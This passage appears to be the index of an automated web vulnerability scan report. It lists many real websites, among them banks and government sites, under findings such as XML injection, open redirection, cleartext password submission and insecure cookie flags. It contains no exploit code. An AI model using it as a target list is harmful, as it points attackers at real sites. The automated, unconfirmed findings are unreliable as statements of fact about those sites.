7.391. http://www.picnik.com/crossdomain.xml

7.392. http://www.playsushi.com/crossdomain.xml

7.393. http://www.plentyoffish.com/crossdomain.xml

7.394. http://www.pogo.com/crossdomain.xml

7.395. http://www.politico.com/crossdomain.xml

7.396. http://www.politicsdaily.com/crossdomain.xml

7.397. http://www.poptropica.com/crossdomain.xml

7.398. http://www.potterybarn.com/crossdomain.xml

7.399. http://www.progressive.com/crossdomain.xml

7.400. http://www.psu.edu/crossdomain.xml

7.401. http://www.realage.com/crossdomain.xml

7.402. http://www.rei.com/crossdomain.xml

7.403. http://www.reuters.com/crossdomain.xml

7.404. http://www.reverbnation.com/crossdomain.xml

7.405. http://www.rightathome.com/crossdomain.xml

7.406. http://www.rivals.com/crossdomain.xml

7.407. http://www.rockyou.com/crossdomain.xml

7.408. http://www.rotoworld.com/crossdomain.xml

7.409. http://www.rottentomatoes.com/crossdomain.xml

7.410. http://www.roxwel.com/crossdomain.xml

7.411. http://www.salesforce.com/crossdomain.xml

7.412. http://www.salon.com/crossdomain.xml

7.413. http://www.scholastic.com/crossdomain.xml

7.414. http://www.sears.com/crossdomain.xml

7.415. http://www.seattlepi.com/crossdomain.xml

7.416. http://www.shangri-la.com/crossdomain.xml

7.417. http://www.shopathome.com/crossdomain.xml

7.418. http://www.shopstyle.com/crossdomain.xml

7.419. http://www.shutterfly.com/crossdomain.xml

7.420. http://www.simon.com/crossdomain.xml

7.421. http://www.simplyhired.com/crossdomain.xml

7.422. http://www.sixflags.com/crossdomain.xml

7.423. http://www.sky.com/crossdomain.xml

7.424. http://www.skype.com/crossdomain.xml

7.425. http://www.slate.com/crossdomain.xml

7.426. http://www.slide.com/crossdomain.xml

7.427. http://www.smarter.com/crossdomain.xml

7.428. http://www.smilebox.com/crossdomain.xml

7.429. http://www.smileycentral.com/crossdomain.xml

7.430. http://www.snapfish.com/crossdomain.xml

7.431. http://www.softonic.com/crossdomain.xml

7.432. http://www.spanishdict.com/crossdomain.xml

7.433. http://www.spellingcity.com/crossdomain.xml

7.434. http://www.sportsauthority.com/crossdomain.xml

7.435. http://www.star-telegram.com/crossdomain.xml

7.436. http://www.startribune.com/crossdomain.xml

7.437. http://www.stumbleupon.com/crossdomain.xml

7.438. http://www.stylelist.com/crossdomain.xml

7.439. http://www.superpages.com/crossdomain.xml

7.440. http://www.symantec.com/crossdomain.xml

7.441. http://www.t-mobile.com/crossdomain.xml

7.442. http://www.tagged.com/crossdomain.xml

7.443. http://www.target.com/crossdomain.xml

7.444. http://www.tarot.com/crossdomain.xml

7.445. http://www.tasteofhome.com/crossdomain.xml

7.446. http://www.telegraph.co.uk/crossdomain.xml

7.447. http://www.thefrisky.com/crossdomain.xml

7.448. http://www.thirdage.com/crossdomain.xml

7.449. http://www.ticketmaster.com/crossdomain.xml

7.450. http://www.tigerdirect.com/crossdomain.xml

7.451. http://www.tinypic.com/crossdomain.xml

7.452. http://www.tmz.com/crossdomain.xml

7.453. http://www.toptenreviews.com/crossdomain.xml

7.454. http://www.toyota.com/crossdomain.xml

7.455. http://www.toysrus.com/crossdomain.xml

7.456. http://www.tracfone.com/crossdomain.xml

7.457. http://www.travelocity.com/crossdomain.xml

7.458. http://www.tripadvisor.com/crossdomain.xml

7.459. http://www.true.com/crossdomain.xml

7.460. http://www.trulia.com/crossdomain.xml

7.461. http://www.tv.com/crossdomain.xml

7.462. http://www.tvguide.com/crossdomain.xml

7.463. http://www.univision.com/crossdomain.xml

7.464. http://www.ups.com/crossdomain.xml

7.465. http://www.usatoday.com/crossdomain.xml

7.466. http://www.use.com/crossdomain.xml

7.467. http://www.usgs.gov/crossdomain.xml

7.468. http://www.usmagazine.com/crossdomain.xml

7.469. http://www.vast.com/crossdomain.xml

7.470. http://www.verizon.net/crossdomain.xml

7.471. http://www.victoriassecret.com/crossdomain.xml

7.472. http://www.videobash.com/crossdomain.xml

7.473. http://www.walletpop.com/crossdomain.xml

7.474. http://www.walmart.com/crossdomain.xml

7.475. http://www.warnerbros.com/crossdomain.xml

7.476. http://www.washingtonpost.com/crossdomain.xml

7.477. http://www.weather.com/crossdomain.xml

7.478. http://www.webshots.com/crossdomain.xml

7.479. http://www.weightwatchers.com/crossdomain.xml

7.480. http://www.wetpaint.com/crossdomain.xml

7.481. http://www.whitehouse.gov/crossdomain.xml

7.482. http://www.wimp.com/crossdomain.xml

7.483. http://www.wn.com/crossdomain.xml

7.484. http://www.womansday.com/crossdomain.xml

7.485. http://www.worldwinner.com/crossdomain.xml

7.486. http://www.wsbtv.com/crossdomain.xml

7.487. http://www.wwe.com/crossdomain.xml

7.488. http://www.yallwire.com/crossdomain.xml

7.489. http://www.yellowpages.com/crossdomain.xml

7.490. http://www.yontoo.com/crossdomain.xml

7.491. http://www.zap2it.com/crossdomain.xml

7.492. http://www.zappos.com/crossdomain.xml

7.493. http://www.zazzle.com/crossdomain.xml

7.494. http://www.zmags.com/crossdomain.xml

7.495. http://www.zshare.net/crossdomain.xml

7.496. http://www.zwinky.com/crossdomain.xml

7.497. http://www.zynga.com/crossdomain.xml

7.498. http://www.active.com/crossdomain.xml

7.499. http://www.allmenus.com/crossdomain.xml

7.500. http://www.autotrader.com/crossdomain.xml

7.501. http://www.autotraderstatic.com/crossdomain.xml

7.502. http://www.blackplanet.com/crossdomain.xml

7.503. http://www.boston.com/crossdomain.xml

7.504. http://www.christianbook.com/crossdomain.xml

7.505. http://www.chuckecheese.com/crossdomain.xml

7.506. http://www.cincinnati.com/crossdomain.xml

7.507. http://www.continental.com/crossdomain.xml

7.508. http://www.deadline.com/crossdomain.xml

7.509. http://www.deviantart.com/crossdomain.xml

7.510. http://www.dreamstime.com/crossdomain.xml

7.511. http://www.elyrics.net/crossdomain.xml

7.512. http://www.elyricsworld.com/crossdomain.xml

7.513. http://www.epicurious.com/crossdomain.xml

7.514. http://www.greatschools.org/crossdomain.xml

7.515. http://www.icontact.com/crossdomain.xml

7.516. http://www.inbox.com/crossdomain.xml

7.517. http://www.iwon.com/crossdomain.xml

7.518. http://www.justluxe.com/crossdomain.xml

7.519. http://www.kazaa.com/crossdomain.xml

7.520. http://www.kodak.com/crossdomain.xml

7.521. http://www.livejournal.com/crossdomain.xml

7.522. http://www.loc.gov/crossdomain.xml

7.523. http://www.lowfares.com/crossdomain.xml

7.524. http://www.lyricsmode.com/crossdomain.xml

7.525. http://www.marriott.com/crossdomain.xml

7.526. http://www.michaels.com/crossdomain.xml

7.527. http://www.mlive.com/crossdomain.xml

7.528. http://www.motime.com/crossdomain.xml

7.529. http://www.movietickets.com/crossdomain.xml

7.530. http://www.orbitz.com/crossdomain.xml

7.531. http://www.panoramio.com/crossdomain.xml

7.532. http://www.phoenix.edu/crossdomain.xml

7.533. http://www.playdom.com/crossdomain.xml

7.534. http://www.regions.com/crossdomain.xml

7.535. http://www.rr.com/crossdomain.xml

7.536. http://www.sacbee.com/crossdomain.xml

7.537. http://www.sharebuilder.com/crossdomain.xml

7.538. http://www.stltoday.com/crossdomain.xml

7.539. http://www.stlyrics.com/crossdomain.xml

7.540. http://www.talkingpointsmemo.com/crossdomain.xml

7.541. http://www.tamu.edu/crossdomain.xml

7.542. http://www.thisis50.com/crossdomain.xml

7.543. http://www.thomasnet.com/crossdomain.xml

7.544. http://www.tradekey.com/crossdomain.xml

7.545. http://www.umich.edu/crossdomain.xml

7.546. http://www.verisign.com/crossdomain.xml

7.547. http://www.vimeo.com/crossdomain.xml

7.548. http://www.vistaprint.com/crossdomain.xml

7.549. http://www.walgreens.com/crossdomain.xml

7.550. http://www.xe.com/crossdomain.xml

8. Silverlight cross-domain policy

8.1. http://ad.doubleclick.net/clientaccesspolicy.xml

8.2. http://s0.2mdn.net/clientaccesspolicy.xml

8.3. http://www.cbssports.com/clientaccesspolicy.xml

8.4. http://www.coveritlive.com/clientaccesspolicy.xml

8.5. http://www.intellicast.com/clientaccesspolicy.xml

8.6. http://www.nadaguides.com/clientaccesspolicy.xml

8.7. http://www.ncm.com/clientaccesspolicy.xml

8.8. http://www.opinionshere.com/clientaccesspolicy.xml

8.9. http://www.safelinkwireless.com/clientaccesspolicy.xml

8.10. http://www.usatoday.com/clientaccesspolicy.xml

8.11. http://www.winbuyer.com/clientaccesspolicy.xml

8.12. http://www.cbs.com/clientaccesspolicy.xml

8.13. http://www.cnbc.com/clientaccesspolicy.xml

8.14. http://www.fidelity.com/clientaccesspolicy.xml

8.15. http://www.indiatimes.com/clientaccesspolicy.xml

8.16. http://www.msnbc.com/clientaccesspolicy.xml

8.17. http://www.nationalgeographic.com/clientaccesspolicy.xml

8.18. http://www.sky.com/clientaccesspolicy.xml

8.19. http://www.xbox.com/clientaccesspolicy.xml

8.20. http://www.kmart.com/clientaccesspolicy.xml

8.21. http://www.sears.com/clientaccesspolicy.xml

8.22. http://www.usa.gov/clientaccesspolicy.xml

9. Cleartext submission of password

9.1. http://www.collegehumor.com/favicon.ico

9.2. http://www.popularscreensavers.com/favicon.ico

9.3. http://www.popularscreensavers.com/favicon.ico

9.4. http://www.popularscreensavers.com/favicon.ico

10. XML injection

10.1. http://www.4shared.com/favicon.ico [REST URL parameter 1]

10.2. http://www.altervista.org/favicon.ico [REST URL parameter 1]

10.3. http://www.bathandbodyworks.com/favicon.ico [REST URL parameter 1]

10.4. http://www.bizrate.com/favicon.ico [REST URL parameter 1]

10.5. http://www.bravotv.com/favicon.ico [REST URL parameter 1]

10.6. http://www.columbia.edu/favicon.ico [REST URL parameter 1]

10.7. http://www.consumersearch.com/favicon.ico [REST URL parameter 1]

10.8. http://www.dickssportinggoods.com/favicon.ico [REST URL parameter 1]

10.9. http://www.diynetwork.com/favicon.ico [REST URL parameter 1]

10.10. http://www.ehow.co.uk/favicon.ico [REST URL parameter 1]

10.11. http://www.examiner.com/favicon.ico [REST URL parameter 1]

10.12. http://www.foodnetwork.com/favicon.ico [REST URL parameter 1]

10.13. http://www.hollywoodlife.com/favicon.ico [REST URL parameter 1]

10.14. http://www.house.gov/favicon.ico [REST URL parameter 1]

10.15. http://www.k12.com/favicon.ico [REST URL parameter 1]

10.16. http://www.kazaa.com/favicon.ico [REST URL parameter 1]

10.17. http://www.macrumors.com/favicon.ico [REST URL parameter 1]

10.18. http://www.orbitz.com/favicon.ico [REST URL parameter 1]

10.19. http://www.psu.edu/favicon.ico [REST URL parameter 1]

10.20. http://www.songmeanings.net/favicon.ico [REST URL parameter 1]

10.21. http://www.southwest.com/favicon.ico [REST URL parameter 1]

10.22. http://www.ufl.edu/favicon.ico [REST URL parameter 1]

10.23. http://www.ultimate-guitar.com/favicon.ico [REST URL parameter 1]

10.24. http://www.usgs.gov/favicon.ico [REST URL parameter 1]

10.25. http://www.where2getit.com/favicon.ico [REST URL parameter 1]

10.26. http://www.wimp.com/favicon.ico [REST URL parameter 1]

10.27. http://www.wunderground.com/favicon.ico [REST URL parameter 1]

11. ASP.NET ViewState without MAC enabled

12. Open redirection

12.1. http://www.lalate.com/favicon.ico [name of an arbitrarily supplied request parameter]

12.2. http://www.outsidehub.com/favicon.ico [name of an arbitrarily supplied request parameter]

12.3. http://www.paypal-shopping.com/favicon.ico [name of an arbitrarily supplied request parameter]

12.4. http://www.swipebids.com/favicon.ico [REST URL parameter 1]

12.5. http://www.swipebids.com/favicon.ico [name of an arbitrarily supplied request parameter]

12.6. http://www.virtuagirlhd.com/favicon.ico [name of an arbitrarily supplied request parameter]

13. Cookie scoped to parent domain

13.1. http://www.androidcentral.com/favicon.ico

13.2. http://www.easybib.com/favicon.ico

13.3. http://www.evite.com/favicon.ico

13.4. http://www.genealogy.com/favicon.ico

13.5. http://www.mapquest.com/favicon.ico

13.6. http://www.mayoclinic.com/favicon.ico

13.7. http://www.musiciansfriend.com/favicon.ico

13.8. http://www.ning.com/favicon.ico

13.9. http://www.pronto.com/favicon.ico

13.10. http://www.softonic.com/favicon.ico

13.11. http://www.thisis50.com/favicon.ico

13.12. http://www.worthpoint.com/favicon.ico

13.13. http://maps.google.com/maps

13.14. http://maps.google.com/maps/gen_204

13.15. http://maps.google.com/maps/vp

13.16. http://safebrowsing.clients.google.com/safebrowsing/downloads

13.17. http://translate.google.com/translate_a/element.js

13.18. http://www.411.com/favicon.ico

13.19. http://www.addresses.com/favicon.ico

13.20. http://www.advanceautoparts.com/favicon.ico

13.21. http://www.alibaba.com/favicon.ico

13.22. http://www.americanexpress.com/favicon.ico

13.23. http://www.apartments.com/favicon.ico

13.24. http://www.automotive.com/favicon.ico

13.25. http://www.autotrader.com/favicon.ico

13.26. http://www.baidu.com/favicon.ico

13.27. http://www.bidcactus.com/favicon.ico

13.28. http://www.bizjournals.com/favicon.ico

13.29. http://www.buzznet.com/favicon.ico

13.30. http://www.cisco.com/favicon.ico

13.31. http://www.collegehumor.com/favicon.ico

13.32. http://www.cornell.edu/favicon.ico

13.33. http://www.directv.com/favicon.ico

13.34. http://www.discovercard.com/favicon.ico

13.35. http://www.eharmony.com/favicon.ico

13.36. http://www.emedtv.com/favicon.ico

13.37. http://www.epinions.com/favicon.ico

13.38. http://www.fedex.com/favicon.ico

13.39. http://www.fool.com/favicon.ico

13.40. http://www.funbrain.com/favicon.ico

13.41. http://www.gamehouse.com/favicon.ico

13.42. http://www.guardian.co.uk/favicon.ico

13.43. http://www.hayneedle.com/favicon.ico

13.44. http://www.hiexpress.com/favicon.ico

13.45. http://www.holidayinn.com/favicon.ico

13.46. http://www.hsn.com/favicon.ico

13.47. http://www.ichotelsgroup.com/favicon.ico

13.48. http://www.imageshack.us/favicon.ico

13.49. http://www.know-where.com/favicon.ico

13.50. http://www.life123.com/favicon.ico

13.51. http://www.lingospot.com/favicon.ico

13.52. http://www.marykay.com/favicon.ico

13.53. http://www.mbnanetaccess.com/favicon.ico

13.54. http://www.metropcs.com/favicon.ico

13.55. http://www.motortrend.com/favicon.ico

13.56. http://www.netflix.com/favicon.ico

13.57. http://www.nintendo.com/favicon.ico

13.58. http://www.nytimes.com/favicon.ico

13.59. http://www.officedepot.com/favicon.ico

13.60. http://www.okcupid.com/favicon.ico

13.61. http://www.pbs.org/favicon.ico

13.62. http://www.pizzahut.com/favicon.ico

13.63. http://www.playlist.com/favicon.ico

13.64. http://www.potterybarn.com/favicon.ico

13.65. http://www.progressive.com/favicon.ico

13.66. http://www.qvc.com/favicon.ico

13.67. http://www.qwest.com/favicon.ico

13.68. http://www.seniorpeoplemeet.com/favicon.ico

13.69. http://www.sfgate.com/favicon.ico

13.70. http://www.sharebuilder.com/favicon.ico

13.71. http://www.terra.com/favicon.ico

13.72. http://www.thefind.com/favicon.ico

13.73. http://www.thehollywoodgossip.com/favicon.ico

13.74. http://www.ticketmaster.com/favicon.ico

13.75. http://www.travelocity.com/favicon.ico

13.76. http://www.true.com/favicon.ico

13.77. http://www.uhaul.com/favicon.ico

13.78. http://www.united.com/favicon.ico

13.79. http://www.veoh.com/favicon.ico

13.80. http://www.verisign.com/favicon.ico

13.81. http://www.virtualtourist.com/favicon.ico

13.82. http://www.vistaprint.com/favicon.ico

13.83. http://www.wachovia.com/favicon.ico

13.84. http://www.warnerbros.com/favicon.ico

13.85. http://www.wellsfargo.com/favicon.ico

13.86. http://www.whitepages.com/favicon.ico

13.87. http://www.wsbtv.com/favicon.ico

13.88. http://www.yellowpages.com/favicon.ico

14. Cookie without HttpOnly flag set

14.1. http://www.androidcentral.com/favicon.ico

14.2. http://www.aon.com/favicon.ico

14.3. http://www.biglots.com/favicon.ico

14.4. http://www.bullishbankers.com/favicon.ico

14.5. http://www.centurylink.com/favicon.ico

14.6. http://www.chacha.com/favicon.ico

14.7. http://www.emedicinehealth.com/favicon.ico

14.8. http://www.evite.com/favicon.ico

14.9. http://www.freeridegames.com/favicon.ico

14.10. http://www.genealogy.com/favicon.ico

14.11. http://www.gofreecredit.com/favicon.ico

14.12. http://www.hayneedle.com/favicon.ico

14.13. http://www.kaboodle.com/favicon.ico

14.14. http://www.livevideo.com/favicon.ico

14.15. http://www.lowermybills.com/favicon.ico

14.16. http://www.lyrics.com/favicon.ico

14.17. http://www.mapquest.com/favicon.ico

14.18. http://www.mayoclinic.com/favicon.ico

14.19. http://www.medicinenet.com/favicon.ico

14.20. http://www.mrmovietimes.com/favicon.ico

14.21. http://www.musiciansfriend.com/favicon.ico

14.22. http://www.ncnetwork.net/favicon.ico

14.23. http://www.ning.com/favicon.ico

14.24. http://www.popularscreensavers.com/favicon.ico

14.25. http://www.prioritymail.com/favicon.ico

14.26. http://www.pronto.com/favicon.ico

14.27. http://www.questia.com/favicon.ico

14.28. http://www.rxlist.com/favicon.ico

14.29. http://www.softonic.com/favicon.ico

14.30. http://www.suntimes.com/favicon.ico

14.31. http://www.thegrids.info/favicon.ico

14.32. http://www.thisis50.com/favicon.ico

14.33. http://www.travel-ticker.com/favicon.ico

14.34. http://www.usajobs.gov/favicon.ico

14.35. http://www.verizon.net/favicon.ico

14.36. http://www.websitealive.com/favicon.ico

14.37. http://www.wellness.com/favicon.ico

14.38. http://www.wendys.com/favicon.ico

14.39. http://www.windows.com/favicon.ico

14.40. http://www.worthpoint.com/favicon.ico

14.41. http://maps.google.com/maps

14.42. http://maps.google.com/maps/gen_204

14.43. http://maps.google.com/maps/vp

14.44. http://safebrowsing.clients.google.com/safebrowsing/downloads

14.45. http://smp.adviva.net/track/v=4

14.46. http://translate.google.com/translate_a/element.js

14.47. http://www.2wire.net/favicon.ico

14.48. http://www.411.com/favicon.ico

14.49. http://www.4shared.com/favicon.ico

14.50. http://www.aarp.org/favicon.ico

14.51. http://www.aboutus.org/favicon.ico

14.52. http://www.addresses.com/favicon.ico

14.53. http://www.adp.com/favicon.ico

14.54. http://www.advanceautoparts.com/favicon.ico

14.55. http://www.alibaba.com/favicon.ico

14.56. http://www.americanexpress.com/favicon.ico

14.57. http://www.americantowns.com/favicon.ico

14.58. http://www.apartmentratings.com/favicon.ico

14.59. http://www.apartments.com/favicon.ico

14.60. http://www.automotive.com/favicon.ico

14.61. http://www.autotrader.com/favicon.ico

14.62. http://www.autozone.com/favicon.ico

14.63. http://www.away.com/favicon.ico

14.64. http://www.baidu.com/favicon.ico

14.65. http://www.bankofamerica.com/favicon.ico

14.66. http://www.bbt.com/favicon.ico

14.67. http://www.bidcactus.com/favicon.ico

14.68. http://www.bizjournals.com/favicon.ico

14.69. http://www.blogrolling.com/favicon.ico

14.70. http://www.business.com/favicon.ico

14.71. http://www.buzznet.com/favicon.ico

14.72. http://www.carmax.com/favicon.ico

14.73. http://www.cars.com/favicon.ico

14.74. http://www.cheapoair.com/favicon.ico

14.75. http://www.cheaptickets.com/favicon.ico

14.76. http://www.cisco.com/favicon.ico

14.77. http://www.classesusa.com/favicon.ico

14.78. http://www.cnn.com/favicon.ico

14.79. http://www.collegeconfidential.com/favicon.ico

14.80. http://www.collegehumor.com/favicon.ico

14.81. http://www.collegesurfing.com/favicon.ico

14.82. http://www.comcast.com/favicon.ico

14.83. http://www.contacthr.com/favicon.ico

14.84. http://www.cornell.edu/favicon.ico

14.85. http://www.coupons.com/favicon.ico

14.86. http://www.cracked.com/favicon.ico

14.87. http://www.curse.com/favicon.ico

14.88. http://www.cyberdefender.com/favicon.ico

14.89. http://www.dallasnews.com/favicon.ico

14.90. http://www.dealer.com/favicon.ico

14.91. http://www.deere.com/favicon.ico

14.92. http://www.directv.com/favicon.ico

14.93. http://www.discovercard.com/favicon.ico

14.94. http://www.doityourself.com/favicon.ico

14.95. http://www.drugstore.com/favicon.ico

14.96. http://www.eharmony.com/favicon.ico

14.97. http://www.ehealthforum.com/favicon.ico

14.98. http://www.emedtv.com/favicon.ico

14.99. http://www.epinions.com/favicon.ico

14.100. http://www.factmonster.com/favicon.ico

14.101. http://www.familydoctor.org/favicon.ico

14.102. http://www.fedex.com/favicon.ico

14.103. http://www.fool.com/favicon.ico

14.104. http://www.frontier.com/favicon.ico

14.105. http://www.funbrain.com/favicon.ico

14.106. http://www.gamehouse.com/favicon.ico

14.107. http://www.gifts.com/favicon.ico

14.108. http://www.guardian.co.uk/favicon.ico

14.109. http://www.guitarcenter.com/favicon.ico

14.110. http://www.gunbroker.com/favicon.ico

14.111. http://www.healthgrades.com/favicon.ico

14.112. http://www.hi5.com/favicon.ico

14.113. http://www.hiexpress.com/favicon.ico

14.114. http://www.holidayinn.com/favicon.ico

14.115. http://www.hotpads.com/favicon.ico

14.116. http://www.hsbccreditcard.com/favicon.ico

14.117. http://www.hsn.com/favicon.ico

14.118. http://www.hubspot.com/favicon.ico

14.119. http://www.ichotelsgroup.com/favicon.ico

14.120. http://www.imageshack.us/favicon.ico

14.121. http://www.in.gov/favicon.ico

14.122. http://www.info.com/favicon.ico

14.123. http://www.infoplease.com/favicon.ico

14.124. http://www.informationgetter.com/favicon.ico

14.125. http://www.intelius.com/favicon.ico

14.126. http://www.investopedia.com/favicon.ico

14.127. http://www.iwon.com/favicon.ico

14.128. http://www.joann.com/favicon.ico

14.129. http://www.jstor.org/favicon.ico

14.130. http://www.kaspersky.com/favicon.ico

14.131. http://www.kbb.com/favicon.ico

14.132. http://www.kcom.com/

14.133. http://www.kcom.com/contact-us/

14.134. http://www.kcom.com/contact-us/brighton

14.135. http://www.kcom.com/large-enterprise/

14.136. http://www.know-where.com/favicon.ico

14.137. http://www.kosmix.com/favicon.ico

14.138. http://www.life123.com/favicon.ico

14.139. http://www.lingospot.com/favicon.ico

14.140. http://www.livenation.com/favicon.ico

14.141. http://www.livescience.com/favicon.ico

14.142. http://www.marykay.com/favicon.ico

14.143. http://www.mbnanetaccess.com/favicon.ico

14.144. http://www.medscape.com/favicon.ico

14.145. http://www.merck.com/favicon.ico

14.146. http://www.modelmayhem.com/favicon.ico

14.147. http://www.motime.com/favicon.ico

14.148. http://www.motortrend.com/favicon.ico

14.149. http://www.mynewplace.com/favicon.ico

14.150. http://www.newegg.com/favicon.ico

14.151. http://www.nintendo.com/favicon.ico

14.152. http://www.nydailynews.com/favicon.ico

14.153. http://www.nymag.com/favicon.ico

14.154. http://www.nytimes.com/favicon.ico

14.155. http://www.officedepot.com/favicon.ico

14.156. http://www.okcupid.com/favicon.ico

14.157. http://www.olivegarden.com/favicon.ico

14.158. http://www.onemanga.com/favicon.ico

14.159. http://www.openforum.com/favicon.ico

14.160. http://www.opinionshere.com/favicon.ico

14.161. http://www.orbitz.com/favicon.ico

14.162. http://www.orchardbank.com/favicon.ico

14.163. http://www.outdoorchannel.com/favicon.ico

14.164. http://www.pbs.org/favicon.ico

14.165. http://www.peekyou.com/favicon.ico

14.166. http://www.peoplelookup.com/favicon.ico

14.167. http://www.pizzahut.com/favicon.ico

14.168. http://www.playlist.com/favicon.ico

14.169. http://www.pnc.com/favicon.ico

14.170. http://www.potterybarn.com/favicon.ico

14.171. http://www.pricegrabber.com/favicon.ico

14.172. http://www.progressive.com/favicon.ico

14.173. http://www.purdue.edu/favicon.ico

14.174. http://www.qualityhealth.com/favicon.ico

14.175. http://www.qvc.com/favicon.ico

14.176. http://www.qwest.com/favicon.ico

14.177. http://www.regions.com/favicon.ico

14.178. http://www.reverbnation.com/favicon.ico

14.179. http://www.righthealth.com/favicon.ico

14.180. http://www.searchassist.com/favicon.ico

14.181. http://www.sfgate.com/favicon.ico

14.182. http://www.sharebuilder.com/favicon.ico

14.183. http://www.shoebuy.com/favicon.ico

14.184. http://www.shutterfly.com/favicon.ico

14.185. http://www.snapfish.com/favicon.ico

14.186. http://www.space.com/favicon.ico

14.187. http://www.staples.com/favicon.ico

14.188. http://www.straighttalk.com/favicon.ico

14.189. http://www.suite101.com/favicon.ico

14.190. http://www.terra.com/favicon.ico

14.191. http://www.thefind.com/favicon.ico

14.192. http://www.theglobeandmail.com/favicon.ico

14.193. http://www.thehollywoodgossip.com/favicon.ico

14.194. http://www.thinkquest.org/favicon.ico

14.195. http://www.ticketmaster.com/favicon.ico

14.196. http://www.totalbeauty.com/favicon.ico

14.197. http://www.tracfone.com/favicon.ico

14.198. http://www.travelocity.com/favicon.ico

14.199. http://www.true.com/favicon.ico

14.200. http://www.tvtxtr.com/favicon.ico

14.201. http://www.uhaul.com/favicon.ico

14.202. http://www.united.com/favicon.ico

14.203. http://www.usa-people-search.com/favicon.ico

14.204. http://www.veoh.com/favicon.ico

14.205. http://www.verisign.com/favicon.ico

14.206. http://www.videobash.com/favicon.ico

14.207. http://www.virtualtourist.com/favicon.ico

14.208. http://www.vistaprint.com/favicon.ico

14.209. http://www.wachovia.com/favicon.ico

14.210. http://www.warnerbros.com/favicon.ico

14.211. http://www.webs.com/favicon.ico

14.212. http://www.wellsfargo.com/favicon.ico

14.213. http://www.whitepages.com/favicon.ico

14.214. http://www.wildgames.com/favicon.ico

14.215. http://www.wirefly.com/favicon.ico

14.216. http://www.wsbtv.com/favicon.ico

14.217. http://www.xe.com/favicon.ico

14.218. http://www.yellowpages.com/favicon.ico

14.219. http://www.zillow.com/favicon.ico

15. Password field with autocomplete enabled

15.1. http://www.collegehumor.com/favicon.ico

15.2. http://www.popularscreensavers.com/favicon.ico

15.3. http://www.popularscreensavers.com/favicon.ico

15.4. http://www.popularscreensavers.com/favicon.ico

16. ASP.NET debugging enabled

16.1. http://www.blogtv.com/Default.aspx

16.2. http://www.clearchannel.com/Default.aspx

16.3. http://www.findlocation.com/Default.aspx

16.4. http://www.investopedia.com/Default.aspx

16.5. http://www.medicare.gov/Default.aspx

16.6. http://www.netquote.com/Default.aspx

16.7. http://www.newegg.com/Default.aspx

16.8. http://www.pch.com/Default.aspx

16.9. http://www.plentyoffish.com/Default.aspx

16.10. http://www.pricegong.com/Default.aspx

16.11. http://www.shopperreports.com/Default.aspx

16.12. http://www.tidaltv.com/Default.aspx

16.13. http://www.weatherbug.com/Default.aspx

16.14. http://www.wellness.com/Default.aspx

16.15. http://www.winbuyer.com/Default.aspx

17. Referer-dependent response

18. Cross-domain POST

18.1. http://www.kcom.com/contact-us/

18.2. http://www.realsimple.com/favicon.ico

19. Cross-domain Referer leakage

19.1. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27

19.2. http://fls.doubleclick.net/activityi

19.3. http://fls.doubleclick.net/activityi

19.4. http://googleads.g.doubleclick.net/pagead/ads

19.5. http://googleads.g.doubleclick.net/pagead/ads

19.6. http://googleads.g.doubleclick.net/pagead/ads

19.7. http://googleads.g.doubleclick.net/pagead/ads

19.8. http://googleads.g.doubleclick.net/pagead/ads

19.9. http://googleads.g.doubleclick.net/pagead/ads

19.10. http://googleads.g.doubleclick.net/pagead/ads

19.11. http://googleads.g.doubleclick.net/pagead/ads

19.12. http://googleads.g.doubleclick.net/pagead/ads

19.13. http://googleads.g.doubleclick.net/pagead/ads

19.14. http://googleads.g.doubleclick.net/pagead/ads

19.15. http://googleads.g.doubleclick.net/pagead/ads

19.16. http://googleads.g.doubleclick.net/pagead/ads

19.17. http://googleads.g.doubleclick.net/pagead/ads

19.18. http://googleads.g.doubleclick.net/pagead/ads

19.19. http://googleads.g.doubleclick.net/pagead/ads

19.20. http://googleads.g.doubleclick.net/pagead/ads

19.21. http://googleads.g.doubleclick.net/pagead/ads

19.22. http://googleads.g.doubleclick.net/pagead/ads

19.23. http://googleads.g.doubleclick.net/pagead/ads

19.24. http://googleads.g.doubleclick.net/pagead/ads

19.25. http://googleads.g.doubleclick.net/pagead/ads

19.26. http://googleads.g.doubleclick.net/pagead/ads

19.27. http://googleads.g.doubleclick.net/pagead/ads

19.28. http://googleads.g.doubleclick.net/pagead/ads

19.29. http://googleads.g.doubleclick.net/pagead/ads

19.30. http://googleads.g.doubleclick.net/pagead/ads

19.31. http://googleads.g.doubleclick.net/pagead/ads

19.32. http://googleads.g.doubleclick.net/pagead/ads

19.33. http://googleads.g.doubleclick.net/pagead/ads

19.34. http://googleads.g.doubleclick.net/pagead/ads

19.35. http://googleads.g.doubleclick.net/pagead/ads

19.36. http://googleads.g.doubleclick.net/pagead/ads

19.37. http://googleads.g.doubleclick.net/pagead/ads

19.38. http://googleads.g.doubleclick.net/pagead/ads

19.39. http://googleads.g.doubleclick.net/pagead/ads

19.40. http://googleads.g.doubleclick.net/pagead/ads

19.41. http://googleads.g.doubleclick.net/pagead/ads

19.42. http://googleads.g.doubleclick.net/pagead/ads

19.43. http://googleads.g.doubleclick.net/pagead/ads

20. Cross-domain script include

20.1. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27

20.2. http://fls.doubleclick.net/activityi

20.3. http://googleads.g.doubleclick.net/pagead/ads

20.4. http://googleads.g.doubleclick.net/pagead/ads

20.5. http://www.411.com/favicon.ico

20.6. http://www.800notes.com/favicon.ico

20.7. http://www.androidcentral.com/favicon.ico

20.8. http://www.biglots.com/favicon.ico

20.9. http://www.bizjournals.com/favicon.ico

20.10. http://www.blogs.com/favicon.ico

20.11. http://www.bullishbankers.com/favicon.ico

20.12. http://www.canon.com/favicon.ico

20.13. http://www.citibank.com/favicon.ico

20.14. http://www.collegehumor.com/favicon.ico

20.15. http://www.curse.com/favicon.ico

20.16. http://www.dealer.com/favicon.ico

20.17. http://www.dexknows.com/favicon.ico

20.18. http://www.ebayclassifieds.com/favicon.ico

20.19. http://www.elyricsworld.com/favicon.ico

20.20. http://www.freeridegames.com/favicon.ico

20.21. http://www.games.com/favicon.ico

20.22. http://www.guitarcenter.com/favicon.ico

20.23. http://www.hayneedle.com/favicon.ico

20.24. http://www.iloveindia.com/favicon.ico

20.25. http://www.kcom.com/contact-us/brighton

20.26. http://www.lanebryant.com/favicon.ico

20.27. http://www.life123.com/favicon.ico

20.28. http://www.menupages.com/favicon.ico

20.29. http://www.moshimonsters.com/favicon.ico

20.30. http://www.mrmovietimes.com/favicon.ico

20.31. http://www.myrecipes.com/favicon.ico

20.32. http://www.newport-news.com/favicon.ico

